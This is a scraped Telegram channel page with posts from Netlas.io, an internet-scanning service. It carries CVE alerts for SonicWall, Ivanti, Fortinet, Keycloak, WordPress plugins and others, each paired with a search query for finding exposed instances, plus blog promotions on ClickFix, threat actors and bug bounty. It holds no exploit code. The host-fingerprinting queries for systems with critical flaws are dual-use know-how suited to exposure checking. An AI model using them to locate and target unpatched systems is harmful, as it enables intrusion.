Netlas.io
رفتن به کانال در Telegram
Explore the latest in cybersecurity with Netlas.io. Stay ahead with updates on high-profile vulnerabilities, expert tutorials, essential safety tips, and the latest Netlas developments.
نمایش بیشتر2 190
مشترکین
+224 ساعت
+167 روز
+5030 روز
آرشیو پست ها
2 191
CVE-2026-4112 and other: SQL injection and TOTP vulnerabilities in SonicWall SMA 1000 Series, up to 7.2 rating ❗️
The most severe vulnerability (SQL injection) allows remote authenticated attacker with read-only administrator privileges to escalate privileges to primary administrator.
Search at Netlas.io:
👉 Link: https://nt.ls/mzseI
👉 Dork: http.favicon.hash_sha256:6bb6f64adaa6a7ed4da10a2fe4edf4cb4d9914aa742c7ad607ca4ca678dcd3f1 OR certificate.subject_dn:"HTTPS Management Certificate for SonicWALL (self-signed)"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0003
2 191
🔄 How to Find Unprotected Databases — Chapter 2
A Netlas beginner’s guide — now republished on our blog (moved from Medium). Reviewed and updated.
🕒 5 min read
👉 https://netlas.io/blog/how_to_find_unprotected_databases_chapter_2/
2 191
CVE-2026-0740: Vulnerability in Ninja Forms WordPress plugin, 9.8 rating
The vulnerability allows unauthenticated attackers to upload arbitrary files to a vulnerable site and achieve remote code execution.
Search at Netlas.io:
👉 Link: https://nt.ls/rkM7h
👉 Dork: http.body:"plugins/ninja-forms"
Read more: https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/
2 191
CVE-2026-3429, CVE-2026-4636 and others in Keycloak.
Several vulnerabilities in Keycloak allow attackers to bypass MFA, steal access tokens, and access confidential user data.
Search at Netlas.io:
👉 Link: https://nt.ls/Ooqi1
👉 Dork: http.favicon.hash_sha256:47dcf1f1a8f1afd68297a294a263849069a7a62b2e86550241416c2cc56c5676
Vendor's advisory: https://www.keycloak.org/2026/04/keycloak-2657-released
2 191
⭐️ Ever wondered how professional threat intelligence feeds are actually built?
Our partners at RST Cloud pull back the curtain on their approach to threat hunting — revealing how they identify, track, and expand command-and-control (C2) infrastructure at scale.
🔍 Inside the post:
• How RST Cloud discovers malicious infrastructure in the wild
• Techniques for linking isolated IoCs into meaningful threat clusters
• The methodology behind building reliable, high-quality threat intelligence feeds
• How Netlas data helps enrich and accelerate investigations
This is a rare look into the real workflows behind modern threat intelligence — straight from a team doing it every day.
🕒 5 min read
👉 https://netlas.io/blog/с2_hunting_by_rst_cloud/
2 191
🔄 Netlas and Uncover
The article has been updated. All commands were reviewed and tested.
👉🏼 Read the guide:
https://netlas.io/blog/netlas_and_uncover/
2 191
Netlas Legal Update
We’ve revised the Netlas Terms & Conditions and API & Data License Agreement.
The updated terms take effect on March 6, 2026.
Details: https://netlas.io/blog/terms_updated/
2 191
Netlas v1.6 is out
🔍 Private Scanner now supports “Scan all ports” — non-intrusive scans across 65,536 TCP ports.
🆕 Added CWMP protocol support.
⚠️ Breaking change: updated Discovery API response format for groups.
Details at https://docs.netlas.io/changelog/
2 191
CVE-2026-1490: Vulnerability in CleanTalk WordPress plugin, 9.8 rating 🔥
The vulnerability allows attackers to install any plugin on an affected website, which could be the first step in any attack chain.
Search at Netlas.io:
👉 Link: https://nt.ls/wZ4Qu
👉 Dork: http.body:"plugins/cleantalk-spam-protect"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-honeypot-anti-spam-by-cleantalk-671-authorization-bypass-via-reverse-dns-ptr-record-spoofing-to-unauthenticated-arbitrary-plugin-installation
2 191
📌 Top 10 Hacking Devices for Ethical Hackers in 2026
Here is a practical guide to the hardware pentesting toolkit that keeps showing up in real engagements: what each device does, what it’s good for, and where the legal/ethical lines are.
What you’ll get from the list:
1️⃣ Flipper Zero 🐬: a pocket multi-tool for Sub-GHz, RFID/NFC, IR and more, plus real-world examples of signal abuse.
2️⃣ USB Rubber Ducky 🦆: HID “keyboard” injection that turns physical access into instant scripted actions.
3️⃣ Wi-Fi / wireless pentest gear 📡: purpose-built tools for testing how networks handle rogue access points and user behavior.
4️⃣ RFID/NFC specialists 🎫: devices like Proxmark3 for assessing badge systems and weak access control tech.
5️⃣ SDR hardware 📻: HackRF and friends for exploring radio-based attack surfaces beyond “normal” Wi-Fi/Bluetooth.
6️⃣ Clear boundaries ⚖️: what’s generally legal to own vs. what becomes illegal fast without written permission and scope.
If you’re building a red-team kit (or defending against these exact techniques), this one’s a solid bookmark. 🔎🛡️
👉 Read here: https://netlas.io/blog/top_10_hacking_devices_2026/
2 191
CVE-2026-1207, -1285, -1287 and other: Multiple vulnerabilities in Django Framework, 5.3 - 7.5 rating❗️
Several vulnerabilities in Django allow attackers to perform SQL injection and DoS attacks.
Search at Netlas.io:
👉 Link: https://nt.ls/SOxq1
👉 Dork: tag.name:"django"
Vendor's advisory: https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
2 191
CVE-2026-1281, -1340: Two vulnerabilities in Ivanti EPMM, 9.8 rating 🔥
Two recent vulnerabilities in Ivanti EPMM allow attackers to perform RCE. Cases have already been reported in the wild!
Search at Netlas.io:
👉 Link: https://nt.ls/EbWv1
👉 Dork: http.headers.set_cookie:("JSESSIONID" "Path" "/mifs")
Vendor's advisory: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US
2 191
📌 Inside ClickFix: how fake prompts took over the web
Fake CAPTCHAs and “verification” pages coax users into pasting system commands via trusted tools like Run or PowerShell. No exploit, no download — the victim executes the payload themselves, sidestepping many defenses.
What’s inside
1️⃣ The evolution: from simple error popups to polished reCAPTCHA/Turnstile clones, OS-aware pages, and video walk-throughs that raise urgency.
2️⃣ Scale of the problem: ESET tracked a 517% rise (H2’24→H1’25); ClickFix-style lures now account for ~8% of blocked attacks.
3️⃣ APT adoption: ClearFake, TA571, Lazarus, Kimsuky, Callisto/Sednit, MuddyWater, APT36 — cross-platform, high-impact use.
4️⃣ Anatomy of an attack: delivery → deceptive prompt → clipboard injection → user-initiated execution → payload retrieval.
5️⃣ Real-world sample: a faux CAPTCHA plants a VBS downloader command, then runs the fetched script from %TEMP%.
6️⃣ Why it lands: Microsoft’s 2025 report calls ClickFix the top initial-access vector, tied to 47% of recorded intrusions.
Bonus: the article includes hunting tips and how to stop these chains at scale. 🔎🛡️
👉 Read here: https://netlas.io/blog/fake_prompts/
2 191
Top 10 Critical Threat Actors - who they are, how they operate, how to respond 📌
Netlas distills the ten most consequential adversaries shaping 2026 risk. For each actor you get a clean snapshot: motives, preferred targets, initial-access methods, tooling/C2 habits, notable intrusions, and concrete detections/mitigations.
What’s inside:
✅ Clear selection criteria (impact, capability, tempo, cross-sector reach) for each actor.
🛠️ Playbook patterns you’ll actually see: phishing & social engineering, supply-chain/third-party abuse, cloud & SaaS compromise, data theft and extortion.
🌐 Infrastructure habits: rotating domains/hosts, abuse of legitimate services, and operational security tells defenders can hunt for.
🏛️ Sector focus: government, finance, telco, healthcare, manufacturing, and critical infrastructure - with risk notes per vertical.
🔐Copy-paste defenses: phishing-resistant MFA, hardening endpoints and SaaS, egress/DNS controls, backup immutability, logging that supports fast IR, and tabletop exercises mapped to these actors.
A practical brief for CISOs, IR leads, and engineering managers planning 2026 controls.
👉 Read now: https://netlas.io/blog/top_10_critical_threat_actors/
2 191
CVE-2025-59718, -59719: Improper Verification of Cryptographic Signature in Fortinet devices, 9.8 rating 🔥
Fortinet researchers have discovered instances of exploitation of last year's vulnerabilities that bypassed patches. We recommend reviewing the mitigation recommendations.
Search at Netlas.io:
👉 Link: https://nt.ls/X38VT
👉 Dork: http.favicon.hash_sha256:d18b3c9feb76c3c1cfdcc51c732f113327e3c33fb3f63b479951f7da6ed1216f
Vendor's advisory: https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios
2 191
CVE-2025-13927, -13928, -13335, CVE-2026-0723, -1102: Multiple vulnerabilitites in GitLab, 3.1 - 7.5 rating❗️
Several recent vulnerabilities in GitLab include DoS, Incorrect Authorization, and other issues.
Search at Netlas.io:
👉 Link: https://nt.ls/5JrG3
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/
2 191
CVE-2025-37165, -37166: Multiple vulnerabilities in Aruba, 7.5 rating❗️
Vulnerabilities in Aruba HPE allow an attacker to perform a DoS or gain knowledge of the internal network configuration.
Search at Netlas.io:
👉 Link: https://nt.ls/AlIHR
👉 Dork: http.favicon.hash_sha256:dfa04944308ed6c96563ff88cdb767ed5177c76c8a386f7a5803b534e9bff753
Vendor's advisory: https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US#hpesbnw04988-rev-1-hpe-networking-instant-on-multi-0
2 191
📌 Bug Bounty 101 — a complete 2026 roadmap for beginners
Netlas’ new guide cuts through the “dead vs $100k” hype: bug bounty isn’t dead, it’s just more mature. Success now comes from smart target selection, solid recon, manual testing, and reports that get accepted.
What’s inside:
1️⃣ Prerequisites checklist: networking, HTTP basics, light coding, core vulns, and why patience/focus matter.
2️⃣ Picking targets: start with VDPs and less-crowded programs; use HackerOne/Bugcrowd/Intigriti and Google dorks to find scopes; stick to one target.
3️⃣ Recon that works: org WHOIS → asset mapping → subdomains; customize your flow, with a concrete Netlas example and CLI tips.
4️⃣ Hunting methodology: build product knowledge first; use a single multi-signal test string to probe inputs; avoid blind payload spam.
5️⃣ Reports that get paid and beginner mistakes to avoid, plus a practical 60-day plan to your first live finding.
👉 Read here: https://netlas.io/blog/bug_bounty_roadmap/
2 191
📌 Software Supply Chain Attacks — how trust breaks, and how to fix it
Modern apps lean on open-source packages, registries, clouds, and CI/CD. When any upstream link is compromised, clean projects ship trojanized code — as in the CCleaner incident. This explainer maps where trust fails and what to harden.
What’s inside:
1️⃣ The chain itself: repos, dependency managers, CI/CD, artifact storage — and the weak assumptions they rely on.
2️⃣ How attacks land: stolen maintainer accounts, poisoned updates, abused credentials, and automated pulls.
3️⃣ Case in point: a signed build gone rogue (CCleaner) shows why “official” isn’t always safe.
4️⃣ Mitigations that matter: SBOMs, provenance and signed builds to verify what you ship and where it came from.
👉 Full article here: https://netlas.io/blog/supply_chain_attack/
2 191
❗️Technical Issue Alert❗️
Due to issues with database cluster, Netlas is temporarily suspended to reboot the affected nodes.
Our team is working hard to resolve the issue as quickly as possible.
👉 You can also follow the Netlas status on the corresponding page: https://status.netlas.io/
We sincerely apologize for the inconvenience and appreciate your patience 🙏
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
